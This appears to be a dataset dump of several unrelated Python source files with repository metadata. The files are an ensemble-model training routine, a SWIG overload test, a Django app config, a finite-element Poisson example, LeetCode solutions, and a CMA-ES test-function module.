y = y.unsqueeze(0).repeat(self.ensemble_size, 1, 1)
mse_losses = (th.square(mean - y) * inv_var).mean(-1).mean(-1)
var_losses = logvar.mean(-1).mean(-1)
total_losses = (mse_losses + var_losses).sum()
total_losses += 0.01*self.max_logvar.sum() - 0.01*self.min_logvar.sum()
return total_losses
def compute_mse_losses(self, x, y):
mean = self.forward(x, deterministic=True, return_dist=False)
if len(y.shape) < 3:
y = y.unsqueeze(0).repeat(self.ensemble_size, 1, 1)
mse_losses = (mean - y)**2
return mse_losses.mean(-1).mean(-1)
def save(self, path):
save_dir = 'weights/'
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
th.save({'ensemble_state_dict': self.state_dict(),
'ensemble_optimizer_state_dict': self.optim.state_dict()}, path + '.tar')
def load(self, path):
params = th.load(path)
self.load_state_dict(params['ensemble_state_dict'])
self.optim.load_state_dict(params['ensemble_optimizer_state_dict'])
def fit_input_stats(self, data):
mu = np.mean(data, axis=0, keepdims=True)
sigma = np.std(data, axis=0, keepdims=True)
sigma[sigma < 1e-12] = 1.0
        self.inputs_mu.data = th.from_numpy(mu).to(self.device).float() # Can I omit .data?
self.inputs_sigma.data = th.from_numpy(sigma).to(self.device).float()
def train_ensemble(self, X, Y, batch_size=256, holdout_ratio=0.1, max_holdout_size=5000, max_epochs_no_improvement=5, max_epochs=200):
self.fit_input_stats(X)
num_holdout = min(int(X.shape[0] * holdout_ratio), max_holdout_size)
permutation = np.random.permutation(X.shape[0])
inputs, holdout_inputs = X[permutation[num_holdout:]], X[permutation[:num_holdout]]
targets, holdout_targets = Y[permutation[num_holdout:]], Y[permutation[:num_holdout]]
holdout_inputs = th.from_numpy(holdout_inputs).to(self.device).float()
holdout_targets = th.from_numpy(holdout_targets).to(self.device).float()
idxs = np.random.randint(inputs.shape[0], size=[self.ensemble_size, inputs.shape[0]])
num_batches = int(np.ceil(idxs.shape[-1] / batch_size))
def shuffle_rows(arr):
idxs = np.argsort(np.random.uniform(size=arr.shape), axis=-1)
return arr[np.arange(arr.shape[0])[:, None], idxs]
num_epochs_no_improvement = 0
epoch = 0
best_holdout_losses = [float('inf') for _ in range(self.ensemble_size)]
while num_epochs_no_improvement < max_epochs_no_improvement and epoch < max_epochs:
self.train()
for batch_num in range(num_batches):
batch_idxs = idxs[:, batch_num * batch_size : (batch_num + 1) * batch_size]
batch_x, batch_y = inputs[batch_idxs], targets[batch_idxs]
batch_x, batch_y = th.from_numpy(batch_x).to(self.device).float(), th.from_numpy(batch_y).to(self.device).float()
loss = self.compute_loss(batch_x, batch_y)
self.optim.zero_grad()
loss.backward()
self.optim.step()
idxs = shuffle_rows(idxs)
self.eval()
with th.no_grad():
holdout_losses = self.compute_mse_losses(holdout_inputs, holdout_targets)
holdout_losses = [l.item() for l in holdout_losses]
#print('Epoch:', epoch, 'Holdout losses:', [l.item() for l in holdout_losses])
self.elites = np.argsort(holdout_losses)[:self.num_elites]
improved = False
for i in range(self.ensemble_size):
if epoch == 0 or (best_holdout_losses[i] - holdout_losses[i]) / (best_holdout_losses[i]) > 0.01:
best_holdout_losses[i] = holdout_losses[i]
num_epochs_no_improvement = 0
improved = True
if not improved:
num_epochs_no_improvement += 1
epoch += 1
print('Epoch:', epoch, 'Holdout losses:', ', '.join(["%.4f"%hl for hl in holdout_losses]))
return np.mean(holdout_losses)
if __name__ == '__main__':
with open('/home/lucas/Desktop/drl-cd/weights/drlcd-cheetah-ns-paper1data0', 'rb') as f:
memory = pickle.load(f)
X, Y = memory.to_train_batch()
model = ProbabilisticEnsemble(X.shape[1], Y.shape[1])
model.train_ensemble(X, Y, max_epochs=200) | [
"[email protected]"
] | |
32899d3e754390786ab649a1de26f959c3d28b8e | ebd6f68d47e192da7f81c528312358cfe8052c8d | /swig/Examples/test-suite/python/overload_template_runme.py | 014ec71cbb0db5035821e801e8ec2cb7a7342c9d | [
"LicenseRef-scancode-swig",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference",
"GPL-3.0-only",
"Apache-2.0"
] | permissive | inishchith/DeepSpeech | 965ad34d69eb4d150ddf996d30d02a1b29c97d25 | dcb7c716bc794d7690d96ed40179ed1996968a41 | refs/heads/master | 2021-01-16T16:16:05.282278 | 2020-05-19T08:00:33 | 2020-05-19T08:00:33 | 243,180,319 | 1 | 0 | Apache-2.0 | 2020-02-26T05:54:51 | 2020-02-26T05:54:50 | null | UTF-8 | Python | false | false | 3,596 | py | from overload_template import *
f = foo()
a = maximum(3, 4)
b = maximum(3.4, 5.2)
# mix 1
if (mix1("hi") != 101):
raise RuntimeError, ("mix1(const char*)")
if (mix1(1.0, 1.0) != 102):
raise RuntimeError, ("mix1(double, const double &)")
if (mix1(1.0) != 103):
raise RuntimeError, ("mix1(double)")
# mix 2
if (mix2("hi") != 101):
raise RuntimeError, ("mix2(const char*)")
if (mix2(1.0, 1.0) != 102):
raise RuntimeError, ("mix2(double, const double &)")
if (mix2(1.0) != 103):
raise RuntimeError, ("mix2(double)")
# mix 3
if (mix3("hi") != 101):
raise RuntimeError, ("mix3(const char*)")
if (mix3(1.0, 1.0) != 102):
raise RuntimeError, ("mix3(double, const double &)")
if (mix3(1.0) != 103):
raise RuntimeError, ("mix3(double)")
# Combination 1
if (overtparams1(100) != 10):
raise RuntimeError, ("overtparams1(int)")
if (overtparams1(100.0, 100) != 20):
raise RuntimeError, ("overtparams1(double, int)")
# Combination 2
if (overtparams2(100.0, 100) != 40):
raise RuntimeError, ("overtparams2(double, int)")
# Combination 3
if (overloaded() != 60):
raise RuntimeError, ("overloaded()")
if (overloaded(100.0, 100) != 70):
raise RuntimeError, ("overloaded(double, int)")
# Combination 4
if (overloadedagain("hello") != 80):
raise RuntimeError, ("overloadedagain(const char *)")
if (overloadedagain() != 90):
raise RuntimeError, ("overloadedagain(double)")
# specializations
if (specialization(10) != 202):
raise RuntimeError, ("specialization(int)")
if (specialization(10.0) != 203):
raise RuntimeError, ("specialization(double)")
if (specialization(10, 10) != 204):
raise RuntimeError, ("specialization(int, int)")
if (specialization(10.0, 10.0) != 205):
raise RuntimeError, ("specialization(double, double)")
if (specialization("hi", "hi") != 201):
raise RuntimeError, ("specialization(const char *, const char *)")
# simple specialization
xyz()
xyz_int()
xyz_double()
# a bit of everything
if (overload("hi") != 0):
raise RuntimeError, ("overload()")
if (overload(1) != 10):
raise RuntimeError, ("overload(int t)")
if (overload(1, 1) != 20):
raise RuntimeError, ("overload(int t, const int &)")
if (overload(1, "hello") != 30):
raise RuntimeError, ("overload(int t, const char *)")
k = Klass()
if (overload(k) != 10):
raise RuntimeError, ("overload(Klass t)")
if (overload(k, k) != 20):
raise RuntimeError, ("overload(Klass t, const Klass &)")
if (overload(k, "hello") != 30):
raise RuntimeError, ("overload(Klass t, const char *)")
if (overload(10.0, "hi") != 40):
raise RuntimeError, ("overload(double t, const char *)")
if (overload() != 50):
raise RuntimeError, ("overload(const char *)")
# everything put in a namespace
if (nsoverload("hi") != 1000):
raise RuntimeError, ("nsoverload()")
if (nsoverload(1) != 1010):
raise RuntimeError, ("nsoverload(int t)")
if (nsoverload(1, 1) != 1020):
raise RuntimeError, ("nsoverload(int t, const int &)")
if (nsoverload(1, "hello") != 1030):
raise RuntimeError, ("nsoverload(int t, const char *)")
if (nsoverload(k) != 1010):
raise RuntimeError, ("nsoverload(Klass t)")
if (nsoverload(k, k) != 1020):
raise RuntimeError, ("nsoverload(Klass t, const Klass &)")
if (nsoverload(k, "hello") != 1030):
raise RuntimeError, ("nsoverload(Klass t, const char *)")
if (nsoverload(10.0, "hi") != 1040):
raise RuntimeError, ("nsoverload(double t, const char *)")
if (nsoverload() != 1050):
raise RuntimeError, ("nsoverload(const char *)")
A_foo(1)
b = B()
b.foo(1)
| [
"[email protected]"
] | |
a45f8d01ea3d38c88df410debafde8bacda6c399 | fa8d47841322bec699cc7d507e94327b63ea4990 | /phonecall/apps.py | b8f64bbad6ab58535833538758addf946deb5d88 | [] | no_license | vitorh45/work-at-olist | f9fd988bd746ecab93ca94dbca70f5eb5ed5c24a | 9cc68f5faa29e8ac1ad061d83b6aae745e9404c7 | refs/heads/master | 2020-06-14T20:12:23.604161 | 2018-11-12T02:18:17 | 2018-11-12T02:18:17 | 75,351,575 | 0 | 0 | null | 2016-12-02T02:13:14 | 2016-12-02T02:13:14 | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class PhonecallConfig(AppConfig):
name = 'phonecall'
| [
"[email protected]"
] | |
ff962c602c1f68d63c7883569742a8670659f422 | e6b45b6cc01a921c3cc510f1a5fff3074dd6b2dd | /example_update1/PoissonFEMWithRobinBC_example.py | 3ff8c61a39419d78d70757f91ba1ecd69df871af | [] | no_license | yoczhang/FEALPyExamples | 3bd339bd5f4576630f767a758da9590a1c068410 | 44d9acbecb528374bc67bba50c62711384228d39 | refs/heads/master | 2023-07-24T21:35:50.633572 | 2023-07-05T02:28:13 | 2023-07-05T02:28:13 | 208,667,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | #!/usr/bin/env python3
#
import sys
import numpy as np
from scipy.sparse.linalg import spsolve
import matplotlib.pyplot as plt
import pyamg
from fealpy.functionspace import LagrangeFiniteElementSpace
from fealpy.boundarycondition import RobinBC
from fealpy.tools.show import showmultirate
p = int(sys.argv[1])
n = int(sys.argv[2])
maxit = int(sys.argv[3])
d = int(sys.argv[4])
if d == 2:
from fealpy.pde.poisson_2d import CosCosData as PDE
elif d == 3:
from fealpy.pde.poisson_3d import CosCosCosData as PDE
pde = PDE()
mesh = pde.init_mesh(n=n)
errorType = ['$|| u - u_h||_{\Omega,0}$',
'$||\\nabla u - \\nabla u_h||_{\Omega, 0}$'
]
errorMatrix = np.zeros((2, maxit), dtype=np.float)
NDof = np.zeros(maxit, dtype=np.float)
for i in range(maxit):
space = LagrangeFiniteElementSpace(mesh, p=p)
NDof[i] = space.number_of_global_dofs()
uh = space.function()
A = space.stiff_matrix()
F = space.source_vector(pde.source)
bc = RobinBC(space, pde.robin)
A, F = bc.apply(A, F)
#uh[:] = spsolve(A, F).reshape(-1)
ml = pyamg.ruge_stuben_solver(A)
uh[:] = ml.solve(F, tol=1e-12, accel='cg').reshape(-1)
errorMatrix[0, i] = space.integralalg.error(pde.solution, uh.value)
errorMatrix[1, i] = space.integralalg.error(pde.gradient, uh.grad_value)
if i < maxit-1:
mesh.uniform_refine()
if d == 2:
fig = plt.figure()
axes = fig.gca(projection='3d')
uh.add_plot(axes, cmap='rainbow')
elif d == 3:
    print('The 3d function plot has not been implemented!')
showmultirate(plt, 0, NDof, errorMatrix, errorType, propsize=20)
plt.show()
| [
"[email protected]"
] | |
cea744c519951b1d792842fa074670506fc24208 | 760e1c14d056dd75958d367242c2a50e829ac4f0 | /bit/338_counting_bits.py | 81ff431da8a2934e28c5d1339ee654906a25b2a5 | [] | no_license | lawtech0902/py_imooc_algorithm | 8e85265b716f376ff1c53d0afd550470679224fb | 74550d68cd3fd2cfcc92e1bf6579ac3b8f31aa75 | refs/heads/master | 2021-04-26T22:54:42.176596 | 2018-09-23T15:45:22 | 2018-09-23T15:45:22 | 123,894,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # _*_ coding: utf-8 _*_
"""
__author__ = 'lawtech'
__date__ = '2018/9/3 4:25 PM'
Given a non-negative integer num, for every number i in the range 0 <= i <= num,
count the number of 1's in its binary representation and return the counts as an array.
Example 1:
Input: 2
Output: [0,1,1]
Example 2:
Input: 5
Output: [0,1,1,2,1,2]
Follow up:
It is easy to give a solution with time complexity O(n*sizeof(integer)). But can you
do it in linear time O(n) with a single pass?
The required space complexity is O(n).
Can you refine the solution further? Solve it without using any built-in function
(such as __builtin_popcount in C++) in C++ or any other language.
Consider the pattern of binary numbers: [000,001,010,011,100,101,110,111] correspond
to [0,1,2,3,4,5,6,7]. From these binary numbers we can see that 4-7 are just 0-3 with
the highest bit flipped from 0 to 1; in other words, each later number is an earlier
number with one extra leading 1 bit, so its bit count is one greater.
"""
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
res = [0]
for i in range(1, num + 1):
res.append(res[i & (i - 1)] + 1)
return res
if __name__ == '__main__':
print(Solution().countBits(5))
| [
"[email protected]"
] | |
8b13f453089664e22c9cd377339d493878b30f89 | 43e5441f74359d620be6f7f80c99622769ea9774 | /venv/Lib/site-packages/cma/fitness_functions2.py | b05afae699ea080bbdbf824990670620695da9b6 | [
"BSD-3-Clause"
] | permissive | 33Da/deeplearn_eassy | 96f1bd09fe3df907c650378215eb686e4ab2801e | 82d60c5ec3aec60822d68d13f11ef1320d0bba2e | refs/heads/master | 2023-02-07T15:02:00.202693 | 2021-01-05T05:03:22 | 2021-01-05T05:03:22 | 326,892,905 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,742 | py | # -*- coding: utf-8 -*-
"""versatile container for test objective functions.
For the time being this is probably best used like::
from cma.fitness_functions2 import ff
Tested with::
import cma, cma.fitness_functions2
cma.ff2 = cma.fitness_functions2
cma.ff2.__dict__
dff, dff2 = dir(cma.ff), dir(cma.ff2)
for f in dff2:
if f in dff and f not in ('BBOB', 'epslow',
'fun_as_arg') and not f.startswith('_'):
try:
getattr(cma.ff, f)(aa([1.,2,3])) == getattr(cma.ff2, f)(aa([1.,2,3]))
except:
try:
assert getattr(cma.ff, f)(aa([1.,2,3]), cma.ff.sphere)\
== getattr(cma.ff2, f)(aa([1.,2,3]), cma.ff2.sphere)
except:
assert all(getattr(cma.ff, f)(aa([1.,2,3]), cma.ff.sphere)
== getattr(cma.ff2, f)(aa([1.,2,3]), cma.ff2.sphere))
"""
from __future__ import (absolute_import, division, print_function,
) # unicode_literals, with_statement)
# from __future__ import collections.MutableMapping
# does not exist in future, otherwise Python 2.5 would work, since 0.91.01
__author__ = "Nikolaus Hansen"
from .utilities.python3for2 import *
del absolute_import, division, print_function
import numpy as np
# arange, cos, size, eye, inf, dot, floor, outer, zeros, linalg.eigh,
# sort, argsort, random, ones,...
from numpy import array, dot, isscalar, sum # sum is not needed
# from numpy import inf, exp, log, isfinite
# to access the built-in sum fct: ``__builtins__.sum`` or ``del sum``
# removes the imported sum and recovers the shadowed build-in
try: np.median([1,2,3,2]) # fails currently in pypy, also sigma_vec.scaling
except AttributeError:
def _median(x):
x = sorted(x)
if len(x) % 2:
return x[len(x) // 2]
return (x[len(x) // 2 - 1] + x[len(x) // 2]) / 2
np.median = _median
from .utilities.utils import rglen as _rglen
# $Source$ # according to PEP 8 style guides, but what is it good for?
# $Id: fitness_functions.py 4150 2015-03-20 13:53:36Z hansen $
# bash $: svn propset svn:keywords 'Date Revision Id' fitness_functions.py
from . import bbobbenchmarks as BBOB
from .fitness_transformations import rotate #, ComposedFunction, Function
def _iqr(x):
x = sorted(x)
i1 = int(len(x) / 4)
i3 = int(3*len(x) / 4)
return x[i3] - x[i1]
def somenan(x, fun, p=0.1):
"""returns sometimes np.NaN, otherwise fun(x)"""
if np.random.rand(1) < p:
return np.NaN
else:
return fun(x)
def epslow(fun, eps=1e-7, Neff=lambda x: int(len(x)**0.5)):
return lambda x: fun(x[:Neff(x)]) + eps * np.mean(x**2)
def rand(x):
"""Random test objective function"""
return np.random.random(1)[0]
def linear(x):
return -x[0]
def lineard(x):
if 1 < 3 and any(array(x) < 0):
return np.nan
if 1 < 3 and sum([(10 + i) * x[i] for i in _rglen(x)]) > 50e3:
return np.nan
return -sum(x)
def sphere(x):
"""Sphere (squared norm) test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
return sum((x + 0)**2)
def subspace_sphere(x, visible_ratio=1/2):
"""
"""
# here we could use an init function, that is this would
# preferably be a class
m = int(visible_ratio * len(x) + 1)
x = np.asarray(x)[np.random.permutation(len(x))[:m]]
return sum(x**2)
def pnorm(x, p=0.5):
return sum(np.abs(x)**p)**(1./p)
def grad_sphere(x, *args):
return 2*array(x, copy=False)
def grad_to_one(x, *args):
return array(x, copy=False) - 1
def sphere_pos(x):
"""Sphere (squared norm) test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
c = 0.0
if x[0] < c:
return np.nan
return -c**2 + sum((x + 0)**2)
def spherewithoneconstraint(x):
return sum((x + 0)**2) if x[0] > 1 else np.nan
def elliwithoneconstraint(x, idx=[-1]):
return ellirot(x) if all(array(x)[idx] > 1) else np.nan
def spherewithnconstraints(x):
return sum((x + 0)**2) if all(array(x) > 1) else np.nan
# zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
def noisysphere(x, noise=2.10e-9, cond=1.0, noise_offset=0.10):
"""noise=10 does not work with default popsize, ``cma.NoiseHandler(dimension, 1e7)`` helps"""
return elli(x, cond=cond) * np.exp(0 + noise * np.random.randn() / len(x)) + noise_offset * np.random.rand()
def spherew(x):
"""Sphere (squared norm) with sum x_i = 1 test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
# s = sum(abs(x))
# return sum((x/s+0)**2) - 1/len(x)
# return sum((x/s)**2) - 1/len(x)
return -0.01 * x[0] + abs(x[0])**-2 * sum(x[1:]**2)
def epslowsphere(x, eps=1e-7, Neff=lambda x: int(len(x)**0.5)):
"""TODO: define as wrapper"""
return np.mean(x[:Neff(x)]**2) + eps * np.mean(x**2)
def partsphere(x):
"""Sphere (squared norm) test objective function"""
partsphere.evaluations += 1
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
dim = len(x)
x = array([x[i % dim] for i in range(2 * dim)])
N = 8
i = partsphere.evaluations % dim
# f = sum(x[i:i + N]**2)
f = sum(x[np.random.randint(dim, size=N)]**2)
return f
partsphere.evaluations = 0
def sectorsphere(x):
"""asymmetric Sphere (squared norm) test objective function"""
return sum(x**2) + (1e6 - 1) * sum(x[x < 0]**2)
def cornersphere(x):
"""Sphere (squared norm) test objective function constraint to the corner"""
nconstr = len(x) - 0
if any(x[:nconstr] < 1):
return np.NaN
return sum(x**2) - nconstr
def cornerelli(x):
""" """
if any(x < 1):
return np.NaN
return elli(x) - elli(np.ones(len(x)))
def cornerellirot(x):
""" """
if any(x < 1):
return np.NaN
return ellirot(x)
def normalSkew(f):
N = np.random.randn(1)[0]**2
if N < 1:
N = f * N # diminish blow up lower part
return N
def noiseC(x, func=sphere, fac=10, expon=0.8):
f = func(x)
N = np.random.randn(1)[0] / np.random.randn(1)[0]
return max(1e-19, f + (float(fac) / len(x)) * f**expon * N)
def noise(x, func=sphere, fac=10, expon=1):
f = func(x)
# R = np.random.randn(1)[0]
R = np.log10(f) + expon * abs(10 - np.log10(f)) * np.random.rand(1)[0]
# sig = float(fac)/float(len(x))
# R = log(f) + 0.5*log(f) * random.randn(1)[0]
# return max(1e-19, f + sig * (f**np.log10(f)) * np.exp(R))
# return max(1e-19, f * np.exp(sig * N / f**expon))
# return max(1e-19, f * normalSkew(f**expon)**sig)
return f + 10**R # == f + f**(1+0.5*RN)
def cigar(x, rot=0, cond=1e6, noise=0):
"""Cigar test objective function"""
if rot:
x = rotate(x)
x = [x] if isscalar(x[0]) else x # scalar into list
f = [(x[0]**2 + cond * sum(x[1:]**2)) * np.exp(noise * np.random.randn(1)[0] / len(x)) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_cigar(x, *args):
grad = 2 * 1e6 * np.array(x)
grad[0] /= 1e6
return grad
def diagonal_cigar(x, cond=1e6):
axis = np.ones(len(x)) / len(x)**0.5
proj = dot(axis, x) * axis
s = sum(proj**2)
s += cond * sum((x - proj)**2)
return s
def tablet(x, cond=1e6, rot=0):
"""Tablet test objective function"""
x = np.asarray(x)
if rot and rot is not tablet:
x = rotate(x)
x = [x] if isscalar(x[0]) else x # scalar into list
f = [cond * x[0]**2 + sum(x[1:]**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_tablet(x, *args):
grad = 2 * np.array(x)
grad[0] *= 1e6
return grad
def cigtab(y):
"""Cigtab test objective function"""
X = [y] if isscalar(y[0]) else y
f = [1e-4 * x[0]**2 + 1e4 * x[1]**2 + sum(x[2:]**2) for x in X]
return f if len(f) > 1 else f[0]
def cigtab2(x, condition=1e8, n_axes=None, n_short_axes=None):
"""cigtab with 5% long and short axes.
`n_axes: int`, if not `None`, sets the number of long axes to
`n_axes` and also the number of short axes if `n_short_axes` is
`None`.
"""
m = n_axes
if m is None:
m = max((1, int(0.05 * (len(x) + 1./2))))
ms = n_short_axes
if ms is None:
ms = m
x = np.asarray(x)
f = sum(x[m:-ms]**2)
f += condition**-0.5 * sum(x[:m]**2)
f += condition**0.5 * sum(x[-ms:]**2)
return f
def twoaxes(y):
"""Cigtab test objective function"""
X = [y] if isscalar(y[0]) else y
N2 = len(X[0]) // 2
f = [1e6 * sum(x[0:N2]**2) + sum(x[N2:]**2) for x in X]
return f if len(f) > 1 else f[0]
def ellirot(x):
return elli(array(x), 1)
def hyperelli(x):
N = len(x)
return sum((np.arange(1, N + 1) * x)**2)
def halfelli(x):
l = len(x) // 2
felli = elli(x[:l])
return felli + 1e-8 * sum(x[l:]**2)
def elli(x, rot=0, xoffset=0, cond=1e6, actuator_noise=0.0, both=False):
"""Ellipsoid test objective function"""
x = np.asarray(x)
if not isscalar(x[0]): # parallel evaluation
return [elli(xi, rot) for xi in x] # could save 20% overall
if rot:
x = rotate(x)
N = len(x)
if actuator_noise:
x = x + actuator_noise * np.random.randn(N)
ftrue = sum(cond**(np.arange(N) / (N - 1.)) * (x + xoffset)**2) \
if N > 1 else (x + xoffset)**2
alpha = 0.49 + 1. / N
beta = 1
felli = np.random.rand(1)[0]**beta * ftrue * \
max(1, (10.**9 / (ftrue + 1e-99))**(alpha * np.random.rand(1)[0]))
# felli = ftrue + 1*np.random.randn(1)[0] / (1e-30 +
# np.abs(np.random.randn(1)[0]))**0
if both:
return (felli, ftrue)
else:
# return felli # possibly noisy value
return ftrue # + np.random.randn()
def grad_elli(x, *args):
cond = 1e6
N = len(x)
return 2 * cond**(np.arange(N) / (N - 1.)) * array(x, copy=False)
def fun_as_arg(x, *args):
"""``fun_as_arg(x, fun, *more_args)`` calls ``fun(x, *more_args)``.
Use case::
fmin(cma.fun_as_arg, args=(fun,), gradf=grad_numerical)
calls fun_as_args(x, args) and grad_numerical(x, fun, args=args)
"""
fun = args[0]
more_args = args[1:] if len(args) > 1 else ()
return fun(x, *more_args)
def grad_numerical(x, func, epsilon=None):
"""symmetric gradient"""
eps = 1e-8 * (1 + abs(x)) if epsilon is None else epsilon
grad = np.zeros(len(x))
ei = np.zeros(len(x)) # float is 1.6 times faster than int
for i in _rglen(x):
ei[i] = eps[i]
grad[i] = (func(x + ei) - func(x - ei)) / (2*eps[i])
ei[i] = 0
return grad
def elliconstraint(x, cfac=1e8, tough=True, cond=1e6):
"""ellipsoid test objective function with "constraints" """
N = len(x)
f = sum(cond**(np.arange(N)[-1::-1] / (N - 1)) * x**2)
cvals = (x[0] + 1,
x[0] + 1 + 100 * x[1],
x[0] + 1 - 100 * x[1])
if tough:
f += cfac * sum(max(0, c) for c in cvals)
else:
f += cfac * sum(max(0, c + 1e-3)**2 for c in cvals)
return f
def rosen(x, alpha=1e2):
"""Rosenbrock test objective function"""
x = [x] if isscalar(x[0]) else x # scalar into list
x = np.asarray(x)
f = [sum(alpha * (x[:-1]**2 - x[1:])**2 + (1. - x[:-1])**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_rosen(x, *args):
N = len(x)
grad = np.zeros(N)
grad[0] = 2 * (x[0] - 1) + 200 * (x[1] - x[0]**2) * -2 * x[0]
i = np.arange(1, N - 1)
grad[i] = 2 * (x[i] - 1) - 400 * (x[i+1] - x[i]**2) * x[i] + 200 * (x[i] - x[i-1]**2)
grad[N-1] = 200 * (x[N-1] - x[N-2]**2)
return grad
def rosen_chained(x, alpha=1e2):
x = [x] if isscalar(x[0]) else x # scalar into list
f = [(1. - x[0])**2 + sum(alpha * (x[:-1]**2 - x[1:])**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def diffpow(x, rot=0):
"""Diffpow test objective function"""
N = len(x)
if rot:
x = rotate(x)
return sum(np.abs(x)**(2. + 4.*np.arange(N) / (N - 1.)))**0.5
def rosenelli(x):
N = len(x)
Nhalf = int((N + 1) / 2)
return rosen(x[:Nhalf]) + elli(x[Nhalf:], cond=1)
def ridge(x, expo=2):
x = [x] if isscalar(x[0]) else x # scalar into list
f = [x[0] + 100 * np.sum(x[1:]**2)**(expo / 2.) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def ridgecircle(x, expo=0.5):
"""happy cat by HG Beyer"""
a = len(x)
s = sum(x**2)
return ((s - a)**2)**(expo / 2) + s / a + sum(x) / a
def happycat(x, alpha=1. / 8):
s = sum(x**2)
return ((s - len(x))**2)**alpha + (s / 2 + sum(x)) / len(x) + 0.5
def flat(x):
return 1
return 1 if np.random.rand(1) < 0.9 else 1.1
return np.random.randint(1, 30)
def ackley(x):
"""default domain is ``[-32.768, 32.768]^n``"""
x = np.asarray(x)
a, b = 20, 0.2
s = np.exp(-b * np.sqrt(np.mean(x**2)))
scos = np.exp(np.mean(np.cos(2 * np.pi * x)))
return a * (1 - s) + (np.exp(1) - scos)
def branin(x):
# in [0,15]**2
y = x[1]
x = x[0] + 5
return (y - 5.1 * x**2 / 4 / np.pi**2 + 5 * x / np.pi - 6)**2 + 10 * (1 - 1 / 8 / np.pi) * np.cos(x) + 10 - 0.397887357729738160000
def goldsteinprice(x):
x1 = x[0]
x2 = x[1]
return (1 + (x1 + x2 + 1)**2 * (19 - 14 * x1 + 3 * x1**2 - 14 * x2 + 6 * x1 * x2 + 3 * x2**2)) * (
30 + (2 * x1 - 3 * x2)**2 * (18 - 32 * x1 + 12 * x1**2 + 48 * x2 - 36 * x1 * x2 + 27 * x2**2)) - 3
def griewank(x):
# was in [-600 600]
x = (600. / 5) * x
return 1 - np.prod(np.cos(x / np.sqrt(1. + np.arange(len(x))))) + sum(x**2) / 4e3
def rastrigin(x):
"""Rastrigin test objective function"""
if not isscalar(x[0]):
N = len(x[0])
return [10 * N + sum(xi**2 - 10 * np.cos(2 * np.pi * xi)) for xi in x]
# return 10*N + sum(x**2 - 10*np.cos(2*np.pi*x), axis=1)
N = len(x)
return 10 * N + sum(x**2 - 10 * np.cos(2 * np.pi * x))
def schaffer(x):
""" Schaffer function x0 in [-100..100]"""
N = len(x)
s = x[0:N - 1]**2 + x[1:N]**2
return sum(s**0.25 * (np.sin(50 * s**0.1)**2 + 1))
def schwefelelli(x):
s = 0
f = 0
for i in _rglen(x):
s += x[i]
f += s**2
return f
def schwefelmult(x, pen_fac=1e4):
"""multimodal Schwefel function with domain -500..500"""
y = [x] if isscalar(x[0]) else x
N = len(y[0])
f = array([418.9829 * N - 1.27275661e-5 * N - sum(x * np.sin(np.abs(x)**0.5))
+ pen_fac * sum((abs(x) > 500) * (abs(x) - 500)**2) for x in y])
return f if len(f) > 1 else f[0]
def schwefel2_22(x):
"""Schwefel 2.22 function"""
return sum(np.abs(x)) + np.prod(np.abs(x))
def optprob(x):
n = np.arange(len(x)) + 1
f = n * x * (1 - x)**(n - 1)
return sum(1 - f)
def lincon(x, theta=0.01):
"""ridge like linear function with one linear constraint"""
if x[0] < 0:
return np.NaN
return theta * x[1] + x[0]
def rosen_nesterov(x, rho=100):
"""needs exponential number of steps in a non-increasing
f-sequence.
x_0 = (-1,1,...,1)
See Jarre (2011) "On Nesterov's Smooth Chebyshev-Rosenbrock
Function"
"""
f = 0.25 * (x[0] - 1)**2
f += rho * sum((x[1:] - 2 * x[:-1]**2 + 1)**2)
return f
def powel_singular(x):
# ((8 * np.sin(7 * (x[i] - 0.9)**2)**2 ) + (6 * np.sin()))
res = np.sum((x[i - 1] + 10 * x[i])**2 + 5 * (x[i + 1] - x[i + 2])**2 +
(x[i] - 2 * x[i + 1])**4 + 10 * (x[i - 1] - x[i + 2])**4
for i in range(1, len(x) - 2))
return 1 + res
def styblinski_tang(x):
"""in [-5, 5]
found also in Lazar and Jarre 2016, optimum in f(-2.903534...)=0
"""
# x_opt = N * [-2.90353402], seems to have essentially
# (only) 2**N local optima
return (39.1661657037714171054273576010019 * len(x))**1 + \
sum(x**4 - 16 * x**2 + 5 * x) / 2
def trid(x):
return sum((x-1)**2) - sum(x[:-1] * x[1:])
def bukin(x):
"""Bukin function from Wikipedia, generalized simplistically from 2-D.
http://en.wikipedia.org/wiki/Test_functions_for_optimization"""
s = 0
for k in range((1+len(x)) // 2):
z = x[2 * k]
y = x[min((2*k + 1, len(x)-1))]
s += 100 * np.abs(y - 0.01 * z**2)**0.5 + 0.01 * np.abs(z + 10)
return s
def zerosum(x):
"""abs(sum xi) has an n-1 dimensionsal solution space.
http://infinity77.net/global_optimization/test_functions_nd_Z.html#go_benchmark.ZeroSum
https://github.com/CMA-ES/c-cmaes/issues/19#issue-323799789
"""
s = np.sum(x)
return 1 + 1e2 * np.abs(s)**0.5 if s else 0.0 | [
"[email protected]"
] | |
dc12825f1785f0eceb733db879c05efe907c1ac8 | e912af291e1457c61606642f1c7700e678c77a27 | /python/532_k-diff_pairs_in_an_array.py | b3078a0372260afbe3f7744d4defba6a128add92 | [] | no_license | MakrisHuang/LeetCode | 325be680f8f67b0f34527914c6bd0a5a9e62e9c9 | 7609fbd164e3dbedc11308fdc24b57b5097ade81 | refs/heads/master | 2022-08-13T12:13:35.003830 | 2022-07-31T23:03:03 | 2022-07-31T23:03:03 | 128,767,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
